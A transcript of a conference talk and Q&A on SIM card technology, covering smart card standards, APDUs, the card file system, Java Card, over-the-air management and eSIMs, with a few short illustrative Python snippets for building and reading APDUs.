And there are lots of dynamic parameters on the card and dynamic means they get rewritten and changed and modified and updated all the time. That's for example the TMSI, the temporary identity that gets allocated by the network every so often. Also the current air interface encryption key like Kc and its successors in modern generation technology. So they get updated and written all the time by the phone. Some of the files are even updated and written by users, at least traditionally or historically, like the phone book and the SMS that are stored on the card. It was originally specified as a full credit card size card and it was intended to be used in radios in rental cars or company shared cars. So basically when you leave the car you would remove your SIM card, the full size credit card size card, and somebody else would put their card in. And allegedly there even were, I think, public GSM phones installed in German trains where you could plug in a SIM card or something like that, but I personally haven't witnessed that since I was ignorant at that time apparently of that fact. So let's get to the mother of all smart card specs which is in German DIN EN ISO/IEC 7816, or short just ISO 7816, and maybe an anecdote about how these specs come around. So there's like the ISO that specifies a certain spec. It gets an ISO number and then EN, the European norm whatever body, comes around and says oh we will elevate this international spec into a European standard and they put an EN in front, and then DIN, the German standards body, comes around and says oh we will elevate this European norm into a German norm and we will put a DIN in front. So now in Germany we have DIN EN ISO/IEC 7816 and if you get the actual copy from DIN it's quite funny. I don't have it here but actually you get a one page additional paper on top which translates the key technical phrases from English to German and that's the added value that you get from it, sorry, I mean it's just hilarious. The entire spec is in English but then there's like this list of key translated terms so you know that 'file' means 'Datei', for example; that's extremely beneficial to the reader of such specifications. Anyway so the title is integrated circuit cards with contacts. I wonder, okay, there are contactless ones now, but at least back then they certainly didn't exist. And it has 15 parts by now; the most relevant parts are one through four, starting from the physical characteristics going to the mechanical dimensions and the location of the contacts, of course it's a separate part of the spec and each of those specs are sold as a separate document of course. So for the physical size you pay, and if you want to know the location of the contacts you have to pay to get another spec. Then there's part three which covers the electronic signals and the transmission protocols, we will look at that in some detail, and then there's part four which is the inter industry commands for interchange, which I find very interesting and I always thought they should have made the international inter industry commands for interworking information interchange but apparently they didn't come up with that and of course this all predates the internet so there's no internet in there. The next relevant spec is GSM technical specification 11.11, very easy to memorize that number, which is the specification of the subscriber identity module-mobile equipment interface.
So in GSM there is what's called a mobile station, which is your phone, and it's comprised of two parts: the mobile equipment, which is the hardware, and the SIM, which sits next to the mobile equipment. And interestingly, the spec doesn't just refer to these ISO specs that I mentioned before, but actually repeats, more or less carbon copies, large portions of these ISO specs, with some amendments, corrections or extensions. Again it gives you the location of the contacts, the mechanical size of the card, the electronic signals, the transmission protocols and so on. But beyond these ISO standards it also actually specifies what makes the SIM a SIM and not any other contact card, which is the information model, the file system on the card, and the commands and protocols that you use on this card. And last, with a typo as usual on my slides, but not least, of course, how to execute the GSM algorithm to perform cryptographic authentication. The physical smart card interface is interesting. I mean, if you've worked with hardware or electronics or serial interfaces, I think it's rather exotic, and exotic always means interesting. So we have four relevant pins. We have a supply voltage, not surprisingly; it can be 5, 3 or 1.8 volts, and interestingly it's not 3.3 volts but 3.0 volts nominal, not sure why, but anyway, that's how it is. We have a clock line that provides a clock signal, which initially needs to be between one and five megahertz, so the phone provides power and clock. We have a reset line, which also makes sense, you want to reset the card, and then we have one I/O line for bidirectional serial communication, so you have RX and TX sharing one line. And there are some nice diagrams about how exactly the sequencing happens when you power it up, nothing really surprising. There's an activation sequence, and after the card is activated, the card will unilaterally send what's called an ATR, the answer to reset, which is just a series of bytes that gives some information about the card capabilities: what protocols, what voltages, what clock rates beyond these initial activation ones are supported. Now, after we've powered up the card, we have the bit transmission level, and it's actually very much like a normal UART. If you ever looked at RS-232 or another UART serial port: rather simple start bit, stop bit, parity, serial bit transmission. What's a bit interesting is that we have a clock, and the baud rate is derived from that clock by a divider, but it's still an asynchronous transmission, so there is no phase relationship between the clock signal and the baud rate that the data uses, which lots of people get wrong, particularly lots of authors of Atmel microcontroller data sheets, which claim that it's a synchronous communication, which it is not. So the direction changes every so often, to have acknowledgments back and forth and to exchange data in both directions, and interestingly a lot of the timings are not specified very well, but I guess nobody cares about that, other than if you want to implement a card reader, which I happen to have gone through this year. Smart card communication: after we are able to transmit bytes between the card and the reader, we have something called an APDU, the application protocol data unit, specified as part of ISO 7816-4, that's the inter-industry commands for interchange. An APDU consists of a couple of bytes. There's a class byte that just specifies the class of command, and there's an instruction byte which specifies the specific instruction, like read file, write file.
We have some parameter bytes whose meaning is specific to the instruction. Then we have the length of the command and the command data, we have an expected response length and response data, and last but not least a so-called status word. With the status word the card basically tells you whether the execution was successful or whether there was some error, what kind of error there was, and things like that. The APDUs are then split into a lower layer transport protocol, the so-called TPDUs. There are two commonly used protocols that are used or specified in the context of SIM cards: one is called T equals zero, which is the one most commonly used with SIM cards. Actually, I've never seen anything else but T equals zero used, but T equals one is another protocol which, according to the specs, every phone needs to implement, and the card can choose whether it does T equals zero or T equals one. Again, I've never seen a card that does T equals one, or at least one that does only T equals one, but the specs would allow that. T equals one is used more in banking and crypto smart cards. The difference mainly is that T equals one is a block-oriented transfer and T equals zero is more of a byte-oriented transfer. T equals one has the advantage that it has CRC and checksumming, so you get more protection against transmission errors, which you don't have in T equals zero. The APDU gets mapped to TPDUs; the details I'll skip here, and this is just an example so you get an idea of how this looks. We have A0 A4 00 00 02 3F 00. The A0 here is the class byte, and A0 is the SIM card class. A4 is select file, so you're selecting a certain file on which you want to operate. The two parameter bytes are zero, 02 is the length of the command data, and then you have two bytes of that length, 3F00, which is basically your slash, your root directory. You want to change to the root directory of the file system, that is basically what this command says, and one hypothetical response is just a status word of 9000, which means success. Selecting a file: so we have a file system on the card; most smart cards do. It's not a file system in the sense of a USB drive that you can mount, where you just have a block abstraction or something; the smart card file system itself runs inside the card, and you just talk to the file system and give it instructions. So if you want to find an analogy in PC technology, it's more like MTP or PTP over USB, where you don't have a block device but you talk to another processor which manages a file system that you can instruct; it's like remote file system access. You have some similarities to normal file systems. I mean, there's a master file, which corresponds to the root directory in PC file systems, you have so-called dedicated files, which are subdirectories, and you have so-called elementary files, which are actual data-containing files as we know them. Beyond that, there are lots of specifics that we don't find in PC or operating system file systems. There is what's called a transparent EF; that's an opaque stream of data, like a normal binary file on any random operating system. But then we have concepts like a linear fixed EF, which contains fixed-size records, and you can seek, basically "give me the 15th record in that file", where the file has a record size of, whatever, 24 bytes for example.
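As a small illustration of the APDU layout and the select example just described: the following is a minimal Python sketch (my own, not any official tooling) that assembles the classic A0 A4 00 00 02 3F 00 command and gives a rough reading of a returned status word. The helper names and the tiny status-word table are assumptions made purely for illustration.

```python
# Minimal sketch: build a CLA/INS/P1/P2/Lc/data command APDU and decode a status word.
# Illustrative only; function names and the status-word table are my own.

def build_apdu(cla: int, ins: int, p1: int, p2: int, data: bytes = b"") -> bytes:
    """Concatenate the 4-byte header and, if present, Lc plus the command data."""
    apdu = bytes([cla, ins, p1, p2])
    if data:
        apdu += bytes([len(data)]) + data
    return apdu

# A0 A4 00 00 02 3F 00 -- classic (2G class byte) SELECT of the master file 3F00
select_mf = build_apdu(0xA0, 0xA4, 0x00, 0x00, bytes.fromhex("3F00"))
print(select_mf.hex(" "))            # -> a0 a4 00 00 02 3f 00

def describe_sw(sw1: int, sw2: int) -> str:
    """Very rough status-word decoding for the common cases mentioned above."""
    if (sw1, sw2) == (0x90, 0x00):
        return "success"
    if sw1 == 0x9F:
        return f"success, {sw2} response bytes available (fetch with GET RESPONSE)"
    return f"other status {sw1:02X} {sw2:02X}"

print(describe_sw(0x90, 0x00))       # -> success
```

The same bytes are what eventually travel over the T=0 wire, which is why the example response can be as short as the two status bytes.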
And then you have something called a cyclic EF, where you have a ring buffer of records, and you have incrementable files, which contain monotonically incrementing counters, things that were apparently important for charging or things like that. Each file has access control conditions that define who can read and/or modify and/or, well, there's no delete, but there's something called invalidating the file; and "who" is basically expressed in terms of which PIN was used to authenticate the entity that performs the operation. So as a user you have PIN 1, and some people will remember you also have a PIN 2, which probably nobody has used since the 90s, and the operator has something called an ADM PIN, an administrative PIN, which gives higher privileges in terms of file system permissions on those files. The kind of commands we see: well, select file, from the example. We have read record and update record, I guess I don't need to say anything about those, then read binary and update binary, and then we have the CHV commands, where CHV is the card holder verification, which is ETSI language for a PIN. Not sure why they don't call it PIN. So there are change PIN, disable PIN and enable PIN commands, which is actually what your phone performs: if you disable the PIN or you change the PIN, exactly those commands are issued to the card. And last but not least, run GSM algorithm. But this is still the 2G-only SIM; we haven't gone beyond 2G yet at this point in the slides. And there are actually not that many more commands; that's really it. Now let's look at the file system hierarchy. We have the MF, the root of the file system, and then we have something called DF Telecom, and the hex numbers in parentheses are the identifiers that are actually used on the protocol level. We have something called DF GSM, which is the GSM directory containing GSM-related parameters, and EF ICCID, where the ICCID is the unique card identifier that's stored on the card. And if you expand that into more detail you get these kinds of graphs, and this is actually taken from one of the specs. You see there's also an Iridium directory, or whatever that one was, the Globalstar directory, and all kinds of people operating different telephony systems basically have their own directories in that scheme. But on GSM we mainly find those two, maybe some subdirectories. So when 3G came around, something happened. As I said, the specifications were shifted from ETSI to 3GPP, but of course chip cards in the context of telecoms have use cases outside of cellular telephony. So the specs were actually split in that area. There's something new called the UICC, the universal integrated circuit card, because the previous one was apparently not universal. That part of the specs remained with ETSI and continues to be developed, and there is the USIM application on top of the UICC, which is what specifies the 3GPP-relevant part, and that gets implemented in something called an ADF, an application dedicated file, ADF USIM. An ADF you can also select or enter using a select command, similar to a normal DF; the difference mainly is that the identifiers are much longer. There are other details, but from a user point of view that's how it looks. So we have a split into the core UICC and, on top, a USIM application. And if you have a SIM card that can be used with 2G and with 3G, then you basically have the classic SIM card, and in addition you have a USIM application on the card.
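To make the file selection and read commands above concrete, here is a rough sketch of reading EF ICCID (file identifier 2FE2, directly under the MF) from a card sitting in a PC/SC reader. It assumes the pyscard library and a 2G-capable card that still accepts the classic A0 class byte; the nibble-swapped BCD decoding at the end is a simplification.

```python
# Rough sketch, assuming a PC/SC reader and the pyscard library (pip install pyscard).
# Reads EF ICCID (file id 2FE2 under the MF) using the classic 2G class byte A0.
from smartcard.System import readers

reader = readers()[0]                  # first attached PC/SC reader
conn = reader.createConnection()
conn.connect()
print("ATR:", bytes(conn.getATR()).hex(" "))

def transmit(apdu):
    data, sw1, sw2 = conn.transmit(apdu)
    print(" ".join(f"{b:02X}" for b in apdu), "->", f"{sw1:02X} {sw2:02X}")
    return data, sw1, sw2

# SELECT MF (3F00), then SELECT EF ICCID (2FE2)
transmit([0xA0, 0xA4, 0x00, 0x00, 0x02, 0x3F, 0x00])
transmit([0xA0, 0xA4, 0x00, 0x00, 0x02, 0x2F, 0xE2])

# READ BINARY, 10 bytes: the ICCID is stored as nibble-swapped BCD digits
data, sw1, sw2 = transmit([0xA0, 0xB0, 0x00, 0x00, 0x0A])
if (sw1, sw2) == (0x90, 0x00):
    iccid = "".join(f"{b & 0x0F:X}{b >> 4:X}" for b in data)
    print("ICCID:", iccid.rstrip("F"))   # trailing F is padding on odd-length ICCIDs
```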
And actually there are some cards that only work with 3G or later technology and don't have a 2G mode, because the operator doesn't have a 2G network. Then you only have a USIM application and you don't have the classic SIM on the card anymore. When 4G, LTE, came around, there was actually no strict requirement to change anything in the SIM card, and you can just use a normal USIM, a UMTS 3G card, on LTE networks. It's the same authentication and key agreement mechanism. They added some additional files that are completely optional, mostly optimizing some bits, and an optional new IMS application. IMS is the IP Multimedia Subsystem, which is 3GPP language for voice over IP, or VoLTE. So IMS is what is used to implement VoLTE, where VoLTE is not a specification term but more a marketing term. And optionally on the SIM card you can have an ISIM application, which stores parameters relevant to the IP Multimedia Subsystem, such as SIP user identities, SIP servers and things like that. If that ISIM application doesn't exist, there is a fallback mechanism by which the identifiers are computed based on the IMSI and so on and so on. So it's not really necessary to have a specific 4G SIM, but it's possible to have one. Once we go to 5G: 5G actually reuses the existing 3G and 4G USIM cards. Again some new optional files have been introduced, and there is one feature, which I guess everyone in here wants to have, that would require a new or changed SIM card: the SUCI, the subscription concealed identifier, can be computed inside the SIM card or by the phone. If it's computed inside the SIM card, then the SIM of course has to have support for doing that computation, and that is something that needs explicit SIM card support. Apart from that, you can use an existing 4G SIM card even on 5G networks; nothing really changed there fundamentally. Okay, now let's look at the cards more from the physical and hardware side, and we will look at the software, the operating systems and the various things you can do with SIM cards later on. We have of course a processor core, many different vendors and architectures, traditionally lots of 8051 derivatives inside smart cards. These days we actually also find a lot of 32-bit ARM cores, quite often so-called SC cores. There is an SC000, an SC100 and an SC300, and SC stands for secure core. So it's not a normal Cortex-M core or something like that, but a secure core, and it's so secure that ARM doesn't even disclose what is secure about it, other than that it is secure. So the documentation, for sure, is securely kept away from anyone who would want to read it. For these chips, the smart card chips used in SIM cards, or generally smart card chips themselves, you often cannot even find a simple one-page data sheet which tells you the main features; even that is already under NDA. You have built-in RAM and built-in ROM, at least for a boot loader normally, but possibly also the OS or parts of the OS, although that is increasingly uncommon. Modern cards, most of them, only have flash, and the entire operating system is in flash, so you can update everything. And then there are applications on top of that, and we will look at applications later when we talk about the software. Unfortunately, contrary to crypto smart cards, where it's possible to have higher prices and therefore rather expensive products, SIM cards are mostly selected purely by cost these days, due to the prepaid boom.
It was different when GSM was introduced. If every subscriber has to get a subscription, and there's going to be hundreds of euros or marks or whatever in revenue, then you can invest a lot of money in a SIM card. But with prepaid cards that get thrown away on a daily basis, you can only pay cents for the card, and then you need to pay another couple of cents for the Java Card, for the Java VM patent royalties and so on and so on, so basically you cannot afford to pay real money for SIM cards anymore. That also explains why a lot of SIM cards today, even though it's technically available, don't have hardware crypto but actually implement it in software, because it's cheaper. And then of course, yeah, well, you have timing-of-execution issues and whatnot. So in terms of software, you have a card operating system; cards that don't have an operating system are memory cards, which are not sufficient for SIM card use cases. In the crypto smart card area, the operating systems are typically well known and documented, to some extent at least. In SIM cards it's slightly different: almost nobody ever mentions what kind of operating system is on the SIM card. Even for the SIM card vendors, it's not something they would put in their marketing or on their homepage, what exact kind of operating systems are on there. The SIM card operating system, also from the cellular network point of view, is an implementation detail, because all the relevant parts are specified as standardized interfaces, and what operating system people use on the card is the operator's choice; it doesn't really matter from that point of view. Early SIM cards, I presume, were rather monolithic, so you didn't really have a separation between operating system and SIM application. Today the software has become more modular; we have this abstraction between the operating system and applications. And traditionally, even when that separation already existed, the operating system was very hardware dependent and non-portable, and the applications were very OS dependent and non-portable. That has changed a bit due to the introduction of Java Card into the SIM card area, which is not required; there's no requirement anywhere that the SIM card must be a Java card. But in practice, most SIM cards are Java cards, because they have certain, at least perceived, advantages, and they are the norm by now. Java Card itself was developed independently of SIM cards. Of course, Java is a Sun technology, so Sun is behind that, and the first actual cards were produced in 1996, so much later than SIM cards came out, by Schlumberger, which is now part of Gemalto. And yeah, we have redundant lines in this presentation. So the Java cards, most of them, implement the GlobalPlatform specifications, which then specify the independent management of the cards and the applications on them. And the Java that you use to write such cards, don't ever think it is real Java. I mean, if you show that to any Java developer, he will probably disappear very quickly. It is a very weird, constrained subset of Java with a special on-card virtual machine, which is not a normal virtual machine; you have a runtime environment that's not the normal runtime environment; you have a special binary format, which is not a JAR file. And the idea is that you have portability of card applications, which makes sense, of course, but one could have done that with whatever other standard as well; you wouldn't necessarily need a virtual machine for that.
Yeah, as I said, there's no functional requirement that a SIM card must be a Java card, but in reality that's the case. I think the portability is the driver here. So if an operator develops some application that runs on a SIM card, you know, every year or so they do a new tender or they have a new SIM card supplier or something like that, they want to run their application on the current and the future and the next future future SIM card and not rewrite all of that from scratch or have that rewritten from scratch all the time. And interestingly, both 3GPP and Etsy specify Java APIs and Java packages, which are specifically available on Java cards that also are SIM cards. So you basically have SIM card specs and you have Java card specs and if you have both of them together, you also have SIM card Java API specs for what kind of additional API applications on the card can use in order to affect SIM relevant aspects of the card. Which brings us to one of the strange historic developments called SIM toolkit or later card application toolkit, which is sort of an ability to offer applications with UI and menu on the phone, right? I mean, the card, of course, doesn't have any user interface, but the card can sort of request like show a menu and offer multiple choices and things like that. Some people will have seen it on some phones, you have this SIM toolkit menu somewhere and I mean, I think in Germany never really took off much in terms of actual applications. I mean, you could probably subscribe to some very expensive premium SMS services if you were really bored. But in other regions, this has been very successful and very, I can say, had a real impact on society. Kenya is always the, I think, the prime example for that where MPSA, the mobile payment system implemented at least initially based around card application toolkit applications basically overtook the banking sector. At some point, everybody did their wire transfers that way, even people who didn't even have a bank account and it basically replaced or substituted large amounts of the everyday banking needs of people. So there are exceptions. Some additional instructions that we have in terms of APDUs, details, I'll not look into these. The next step after SIM toolkit is the so-called proactive SIM. If we look at the SIM card communication as it is specified or smart card communication in general, it's always the reader in this context, the phone that sort of sends an instruction to the card and the card responds. So the card is always the slave in the communication and it doesn't have any possibility to trigger something by itself. And that was sort of worked around by the proactive SIM specifications where a command or a request from the card is piggybacked into responses to the commands from the phone to the card. And then basically the SIM card can request the phone to basically poll the card every so often. So the phone can ask, well, do you have a new command for me now? And the card can say yes or no. And this way they work around this restriction. And it's not only polling that can be requested, but it can be event notifications and event notifications can be loss of network coverage, registration to a new cell, opening of a web browser, and like, are you making a mobile-originated call? Are you sending an SMS, whatnot? So all these kind of events can be sent to the SIM card so that the SIM card can do whatever with it. 
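To give an idea of what such a proactive command looks like on the wire, here is a minimal sketch of walking its TLV structure. The tag numbers and the hand-assembled DISPLAY TEXT example reflect my reading of the card application toolkit specs and are simplified, so treat them as illustrative rather than authoritative.

```python
# Minimal sketch of walking the TLVs inside a proactive command. The layout (outer D0
# tag, then tag/length/value items, 0x80 as the "comprehension required" bit) follows
# my reading of the card application toolkit specs; tag names are simplified.
TAG_NAMES = {0x01: "command details", 0x02: "device identities", 0x0D: "text string"}

def parse_tlvs(buf: bytes):
    i = 0
    while i < len(buf):
        tag = buf[i] & 0x7F                    # strip the comprehension-required bit
        if buf[i + 1] == 0x81:                 # one-byte extended length form
            length, hdr = buf[i + 2], 3
        else:
            length, hdr = buf[i + 1], 2
        yield tag, buf[i + hdr:i + hdr + length]
        i += hdr + length

# Hand-assembled, hypothetical DISPLAY TEXT proactive command, for illustration only.
text = b"hello"
pdu = bytes.fromhex(
    "D011"          # proactive command tag + total length of what follows
    "8103012180"    # command details: number 01, type 21 (DISPLAY TEXT), qualifier 80
    "82028102"      # device identities: SIM -> display
    "8D06" "04"     # text string: length 6, coding scheme 04 (8-bit) ...
) + text            # ... plus the payload itself

for tag, value in parse_tlvs(pdu[2:]):
    print(TAG_NAMES.get(tag, f"tag {tag:02X}"), "->", value.hex(" "))
```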
I think there are not many useful applications beyond steering of roaming, or roaming control, by basically looking at where you register, what kind of cells you see, and even the measurement reports on signal strength, which can be fed into the SIM card, which then can basically decide what to do. But yeah, I think it's all rather exotic, and there are very few relevant or good use cases for this. The next step is over-the-air technology, OTA, which is the ability for the operator to transparently communicate with the SIM card in the field. With a traditional, non-OTA-capable SIM card, the operator writes, or the SIM card manufacturer writes on behalf of the operator, the card at manufacturing time, at the so-called personalization time of the card, and then it's with the subscriber. And if the operator ever wants to fix something or change something, they have to send a new plastic card. With over-the-air, the cards can be updated. It's based on proactive SIM technology, and there are by now many different communication channels by which some backend system at the operator can interact with a card inside the phone of the subscriber. The classic channel is SMS-PP, which is SMS as you know it, just officially called SMS point-to-point. It's also possible over SMS-CB, the cell broadcast SMS, which I find very interesting: bulk updates to SIM cards via cell broadcast, which would also mean that they all have a shared key for authenticating these updates. But well, it's also specified for USSD from release seven of the specs onwards, and then there's something new at that point called BIP, the Bearer Independent Protocol, that works over circuit-switched data and GPRS, with some spec numbers if anyone is interested, and now, since release nine, which means sort of since LTE is around, also over HTTPS. I'll get to that in a couple of separate slides. There's actually a TLS implementation in SIM cards these days, believe it or not. So there are cryptographic security mechanisms that are specified, but of course the detailed use is up to the operator. The operator may choose whether or not to use message authentication, whether or not to use encryption, and whether or not to use counters for replay protection. And this is basically one area where a lot of the security research and the vulnerabilities published over the last decade or so have been happening: cards were not properly configured, or they had implementation weaknesses, or you had sort of oracles that you could query when interacting with those cards as an attacker. One of the use cases over the air is RFM. It's not RTFM, it's RFM, remote file management, which was introduced in release six, and the number of typos is embarrassing. It's a common use case over the air; it allows you to read or update files in the file system remotely, and that you can use, for example, for the preferred or forbidden roaming operator lists, which is a very legitimate use case. There's also an ancient example that I always like: I think Vodafone Netherlands once advertised that the operator can take a backup of your phone book on the SIM card. Yeah, I think it's an early manifestation of cloud computing before it even existed. In any case, certainly a feature that everyone in here would like to have. Of course, it's irrelevant by now, because nobody has contacts on SIM cards anymore. The next is RAM, which is not random access memory.
No, it's remote application management was also introduced in the same release with the same typo and it allows installation and or removal of applications on the card and applications in terms of Java card then means Java cardlets. For example, you could update or install new multi-IMSI applications, which is one very creative way of using SIM cards in more recent years or new SIM toolkit applications, for example. The IMSI application in case somebody hasn't heard of that yet is basically a SIM card that changes its IMSI depending on where you currently roam in order to do sort of least cost roaming agreement for the operator. Because if he uses his real own IMSI, then maybe the roaming cost would be more extensive than he uses some kind of borrowed IMSI from another operator that then gets provisioned there, which has a better roaming agreement and it works around ridiculous roaming charges, at least between the operators, of course, not towards the user. Now we get to the sort of premium feature of modern SIM cards, sorry, where, of course, well, SMS, yes, you can still do SMS over LTE, but it's sort of this added on clutch. USSD I think doesn't exist anymore because of the circuit switch feature. You need some kind of new transport channel of how to talk to the SIM card and in release 9, they came up with something called over the air over HTTPS, which is specified in global platform 2.2 amendment B and you have to get that specific amendment as a separate document, it's at least free of charge. And actually it uses HTTP, okay, so nice and good. And then it uses something PSK TLS that I've never heard of before, so pre-shared keys with TLS. I mean, I'm not a TLS expert, as you can probably guess, but I don't think anyone ever like, with normal like browsers and so on would want to use pre-shared keys. But it exists in the specs and there's several different cipher modes that I've listed here, which are permitted for over the air over HTTPS, which of those or which subset to use is, of course, up to the operator because it's his SIM card talking to his server so they can do whatever they want there. The interesting part is that the IP and the TCP is terminated in the phone and then whatever is inside the TCP stream gets passed to the card, which implements the TLS and the HTTP inside and then inside HTTP, you actually have hex string representations of the APD use that the card normally processes. So you have this very interesting stack of different technologies and if you look at how exactly they use HTTP, you ask yourself, why did they bother with HTTP in the first place if they modified it beyond recognition? But we'll see. So the way how this is implemented interestingly is that the card implements an HTTP client that performs HTTP post and the APD, so your card somehow by some external mechanism gets triggered. So you must connect to your management server now because the management server wants something from you and then the card does an HTTP post over TLS with pre-shared keys to the management server and then in the post response, there is a hex encoded APD for the card to be executed by the card. And then you have tons of additional HTTP headers. I'm not going to explain. Well, the CRLF is just a copy and paste error, but yeah, you see there is like what all kinds of X admin headers and it will completely not work with normal HTTP. So why use HTTP in a context I don't really know. Yeah, I thought I had an example here, but I didn't put it, thought it's too much detail. 
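Since the slide example was left out, here is a toy mock-up, in Python, of the exchange shape described above: the card-side client POSTs to an admin server, and the response body carries a hex-encoded APDU to execute. This deliberately runs over plain HTTP on localhost and uses placeholder paths and headers; the real GlobalPlatform Amendment B traffic runs over PSK-TLS and defines specific X-Admin headers and content types that are not reproduced here.

```python
# Toy mock-up of the exchange shape only, NOT the real GlobalPlatform Amendment B format.
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from http.client import HTTPConnection

class ToyAdminServer(BaseHTTPRequestHandler):
    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        print("card reported:", body.decode(errors="replace"))
        next_apdu = "A0A40000023F00"                     # tell the "card" to SELECT the MF
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")   # placeholder, not the real content type
        self.end_headers()
        self.wfile.write(next_apdu.encode())

    def log_message(self, *args):                        # keep the demo output quiet
        pass

server = HTTPServer(("127.0.0.1", 0), ToyAdminServer)    # port 0 = pick a free port
port = server.server_address[1]
threading.Thread(target=server.serve_forever, daemon=True).start()

# "Card side": POST a status report, get back the next APDU to run.
conn = HTTPConnection("127.0.0.1", port)
conn.request("POST", "/toy-admin", body=b"status=ok")
print("next APDU to execute:", conn.getresponse().read().decode())
server.shutdown()
```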
But in the end, if you look at this, yeah, I mean, you need to write your own HTTP server or heavily modify it anyway and the card, well, yeah. Okay. But you have HTTP in there. Well, okay. Another technology, sort of random, I didn't really know where to put it in terms of ordering is this SAT technology, which is something really strange that's specified outside all of these specification bodies that I mentioned before. It's another, I'm just mentioning it because it's another vector that has more recently been exploited, another vulnerability where actually, let's say, you don't want to run, you don't want to write a Java application to run on the card, but you still want to use sim toolkit. So your card, most likely inside a Java VM, implements a VM for another byte code, which is this SAT byte code, which gets basically pushed from the server into the card. So the card can then instruct your phone to display some menu to you. It's like, hmm, okay. Very exciting technology. I'm sure there was a use case for it at some point. I haven't really figured it out. So there is something called an SAT browser, which runs inside the card. As I said, most likely that browser is implemented in Java, running inside the Java VM. It's not a web browser, of course. It just called a browser and it parses this binary format, which then creates some sim toolkit menus or whatever. So yeah, I haven't really looked into detail. It's too strange even to look at it. But not least, we have something called the eSIM, which many people may know as a particular, how can I say, particularly dominant in the Apple universe, where the sim card is no longer a replaceable or exchangeable plastic card with contacts, but it's actually sold into the device. This package form factor is called MFF2, the machine form factor. Not sure why it's two. I've never seen a one before. And it's a very small, like, 8-pin package, SMD package that gets sold on a circuit board. And of course, at that point, you have to have some mechanism by which the actual profile, meaning the user identity, the keys, and all the configuration parameters and so on, can be updated or replaced remotely. And that in a way, that will work between different operators which are competing in the industry and which don't really want to replace those profiles, at least not inherently. And this is why this is managed by the GSMA as an umbrella or entity of all the operators. And it specifies an amazing number of acronyms. And trust me, if I say that, it is an amazing number of acronyms on how the cryptography and how the different entities and how the different interfaces work and all the different roles and the parties and each implementation and each party needs to be certified and approved and so on and so on. And in the end, you have a system by which, after a letter of approval between operators, a new identity from a new operator can be downloaded in the card in a cryptographically secure way. So at least is the intent of the specification. I am not the person to judge on that and replace the profile. But it's not that you as the owner of the device can do that, but it's just all the operators that are part of the club and are approved and certified by GSMA can actually add and or remove profiles and thus facilitate the transition from operator A to operator B in those cards. 
They don't only exist in this soldered form factor; you can also actually buy plastic cards that allow this. It's mostly used in IoT devices, which I still call machine to machine, the old marketing term for that: some random cellular-connected device that you want to update remotely. And as a final slide: the CCC event SIM cards that are around here, if you use the cellular networks, are Java Card based SIM and USIM cards. They support over the air, the RAM, not the random one but the remote application management, and the remote file management, at least via SMS-PP; I haven't tested anything else. They for sure do not support HTTPS yet. And if you're interested in playing with any of that and writing your own Java applets, there's even a Hello World one that has been around for several years that you can use as a starting point. You can get the keys for your specific card from the GSM team, and then you can play with all of this in a way that normally only the operator can do with the card. Some hyperlinks, which are actual hyperlinks on those slides, so you have to look at the PDF to see them. Yeah, and that brings me to the last slide. I'm very happy to see questions. Thanks. Thank you, thank you so much. Actually, talks like this one are one of the main reasons I go to Congress, because sometimes I just take a dive into a topic I know nothing about and it's presented by a person with literally decades of experience in the field. So it's amazing. And we have time for questions, so keep them coming. And the first one is microphone number four. What you say makes me want to have a firewall between my phone and my SIM card. Is there a firewall? Not to my knowledge, really. I mean, there are some vendors of specifically secure telephones that say, well, we have a firewall sort of built in, not sure to what extent and in what detail, but not as a separate product or a separate device. At some point, people developed so-called interposer SIM cards, which you can slide between the SIM card and the phone, but that doesn't really work with nano SIM cards and so on anymore, and those interposers were mostly used to avoid SIM locking and so on. But of course, with such a device you could implement a firewall. Keep in mind that almost all of the communication, I mean, the OTA may be encrypted, but all of the communication between the phone and the card is completely unauthenticated and unencrypted, so you can actually intercept and modify that as much as you want. And there's actually a project I forgot to mention in more detail: there's an Osmocom project called SIMtrace, which is a device that you can put in as a man in the middle to trace the communication between card and phone. Thank you. Mic one. Could you please elaborate a little bit on the Simjacker attack? Because the telephone providers said it's only possible if you have the S@T browser on the SIM card, and most claim they don't have it. So do you have a feeling how many of the SIM cards have an S@T browser and are attackable, or which other applications are attackable by the Simjacker attack? I'm not involved in those attacks, so I cannot really comment on that in detail. But I know there is a tool available, an open source tool made available by SRLabs, which allows you to test cards. So if you want to check different cards, you can use that SIMtester; I think it's linked from the slide here. The SRLabs SIMtester, it's a Java application.
I don't have any figures or knowledge about this in terms of the figures you're asking for. Sorry. Thank you. Let's take a question from the internet next. Hi, internet people. There was a question. Can the eSIM be seen as back to the rules, especially compared to what the US market had in the early time? That refers to the situation that the identity is hardwired into the phone and not replaceable. And I think no, not really. Because it can be replaced and it can be replaced by any of the operate, like the normal commercial operators. Of course, it means you cannot use such a device in, let's say, a private GSM network or in a campus network for 5G, which apparently everybody needs these days now. So there are limitations for such use cases. But in terms of the normal phones switching between operator A and operator B, that's exactly what the system is trying to solve. It's just that if you're not part of the club, you've lost. Thank you. The person behind mic 5 has a very nice hat and we're all about fashion here. So the next question goes to you. Nobody told me that. This is a cow's mentor said, not a Google one. And my question was just answered, I think, because I wanted to know what prevents a Pock from providing an eSIM. A profile for an eSIM, yes. That's exactly the problem that it needs in order to install it. It needs to be approved and signed and so on and so on. And you need to be part of that GSM process. So first of all, you would have to technically implement all of that, which is doable and all the specs are public. But then you need to get it certified, which is maybe less doable. And then finally, since you're not a GSM member and not an operator, you cannot become a GSM member and you don't have the funds for it anyway. So that is certainly not going to work. But the Pock could provide an actual like a physical eSIM chip. So if somebody wants to do hot air rework, that's easy. And I mean, you can buy them just like other SIM cards and then you have your identity inside. But of course, that doesn't really solve your problem, I suppose. Thank you. No more people in cool hats. So we'll keep picking a random. Mike Seven, please. Thanks for the amazing talk. I have a question about the flash file system on the cards. I've already worked with the cards on the file system level and you for some files, you need to specify these. You need to do like an authentication tango, provide the CHV like the pin one, and then you only have access to some of the files. And since cheap flash is built into those devices, my question is whether there are cheap hardware or software tricks to access the files or modify the files which are usually locked behind the pin. Not that I'm aware of. And if I would say they are rather specific to the given OS or whatever on the cards and there's so many out there. So I think it's unlikely in terms of write cycles, you can typically buy between 100,000 and 500,000 write cycle flash in SIM card chips. That's sort of what the industry sells. But then of course you have all kinds of ware leveling and then there are algorithms and SIM card operating systems even go as far as to like you can specify which files are more like the update frequency. So it will use different algorithms for managing the flash ware. But an interesting anecdote for that if we have the minute. I was involved in OpenMoco. Some people may remember that it was an open source smartphone in 2007. 
